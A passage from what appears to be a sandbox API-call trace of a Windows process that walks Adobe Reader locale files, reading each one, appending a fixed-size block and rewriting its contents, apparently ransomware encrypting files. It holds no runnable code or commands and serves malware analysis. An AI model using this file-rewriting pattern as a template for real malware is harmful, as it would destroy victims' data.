lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.187] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.187] WriteFile (in: hFile=0x1d4, lpBuffer=0x25ad0a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad0a8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.187] CloseHandle (hObject=0x1d4) returned 1 [0085.496] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.497] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.497] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x95c9 [0085.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.498] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.498] ReleaseMutex (hMutex=0x168) returned 1 [0085.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0085.498] ReadFile (in: hFile=0x1cc, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.501] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x85c9 [0085.501] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.501] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x85c9 [0085.501] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.502] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.502] WriteFile (in: hFile=0x1cc, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.502] CloseHandle (hObject=0x1cc) returned 1 [0085.503] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Annots.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\annots.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.503] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.503] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x75800 [0085.503] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.504] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.504] ReleaseMutex (hMutex=0x168) returned 1 [0085.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.SLV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.SLV", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.SLV", lpUsedDefaultChar=0x0) returned 10 [0085.504] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.507] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x74800 [0085.507] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.511] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x74800 [0085.511] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.511] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.512] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.512] CloseHandle (hObject=0x1cc) returned 1 [0085.512] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\MakeAccessible.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\makeaccessible.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.513] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.513] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x11e00 [0085.513] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.513] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.513] ReleaseMutex (hMutex=0x168) returned 1 [0085.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.SLV", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0085.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.SLV", cchWideChar=18, lpMultiByteStr=0x1f88ba4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MakeAccessible.SLV", lpUsedDefaultChar=0x0) returned 18 [0085.514] ReadFile (in: hFile=0x1cc, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.516] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x10e00 [0085.517] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.530] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x10e00 [0085.530] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.531] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.531] WriteFile (in: hFile=0x1cc, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.532] CloseHandle (hObject=0x1cc) returned 1 [0085.532] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Search.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\search.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.533] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.533] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x5a00 [0085.534] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.534] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.534] ReleaseMutex (hMutex=0x168) returned 1 [0085.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.SLV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.SLV", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.SLV", lpUsedDefaultChar=0x0) returned 10 [0085.534] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.543] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4a00 [0085.544] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.544] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x4a00 [0085.544] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.544] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.544] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.545] CloseHandle (hObject=0x1cc) returned 1 [0085.545] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Acroform.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\acroform.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.546] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.546] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x63e00 [0085.546] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.546] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.546] ReleaseMutex (hMutex=0x168) returned 1 [0085.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.SVE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.SVE", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.SVE", lpUsedDefaultChar=0x0) returned 12 [0085.547] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.553] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x62e00 [0085.553] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.559] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x62e00 [0085.559] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.560] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.560] WriteFile (in: hFile=0x1cc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.560] CloseHandle (hObject=0x1cc) returned 1 [0085.561] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\EScript.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\escript.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x9a00 [0085.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.562] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.562] ReleaseMutex (hMutex=0x168) returned 1 [0085.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.SVE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.SVE", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.SVE", lpUsedDefaultChar=0x0) returned 11 [0085.562] ReadFile (in: hFile=0x1cc, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.926] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8a00 [0085.927] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.927] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x8a00 [0085.927] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.928] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0085.928] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665398*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.928] CloseHandle (hObject=0x1cc) returned 1 [0085.928] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\reflow.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\reflow.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.929] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.929] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x1200 [0085.929] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.930] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.930] ReleaseMutex (hMutex=0x168) returned 1 [0085.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.SVE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.SVE", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.SVE", lpUsedDefaultChar=0x0) returned 10 [0085.930] ReadFile (in: hFile=0x1cc, lpBuffer=0x2665398, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesRead=0x331f2bc*=0x1200, lpOverlapped=0x0) returned 1 [0085.932] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0085.932] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665398*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesWritten=0x331f2d0*=0x1788, lpOverlapped=0x0) returned 1 [0085.932] CloseHandle (hObject=0x1cc) returned 1 [0085.933] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Weblink.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\weblink.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0085.933] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.934] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6a00 [0085.934] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0085.934] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.934] ReleaseMutex (hMutex=0x168) returned 1 [0085.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.SVE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.SVE", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.SVE", lpUsedDefaultChar=0x0) returned 11 [0085.934] ReadFile (in: hFile=0x1cc, lpBuffer=0x2665398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.937] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5a00 [0085.937] ReadFile (in: hFile=0x1cc, lpBuffer=0x2665398, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.937] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5a00 [0085.937] WriteFile (in: hFile=0x1cc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.938] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, 